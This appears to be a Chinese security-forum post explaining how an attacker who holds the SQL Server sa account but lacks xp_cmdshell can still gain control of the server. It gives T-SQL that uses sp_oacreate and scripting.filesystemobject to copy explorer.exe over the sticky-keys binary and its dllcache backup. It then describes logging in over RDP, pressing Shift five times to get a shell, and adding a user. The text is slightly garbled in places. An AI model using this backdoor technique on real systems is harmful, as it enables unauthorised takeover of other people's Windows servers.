信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)
有了sa但无xp_cmdshell
如何恢复都提示出错
好象是xxxx.cpp哪里哪里出错或者找不到指定模块反正我遇到好多次了在用exec sp_oacreate 'wscript.shell'也没办法
情况下可用此思路方法(很多服务器都把'wscript.shell'给删了
)看到既然能用sp_oacreate
sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject网上看到
文章都只有几个使用方法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件于是乎应该可以也能复制删除文件吧上网找了些资料
得到下面思路方法:复制文件:
declare @o
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\
hc.exe';declare @oo
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\
hc.exe' ,'c:\windows\system32\dllcache\hc.exe';成功后3389登陆按 5次sh
t键成功进入服务器
直向上点”我电脑“右键“管理” 用户管理直接加用户此法随无技术可言
希望对某些人有点用
篇文章: 再次突破雷客图ASP站长安全助手篇文章: 基于CallStackAnti-Rootkit HOOK检测思路
最新评论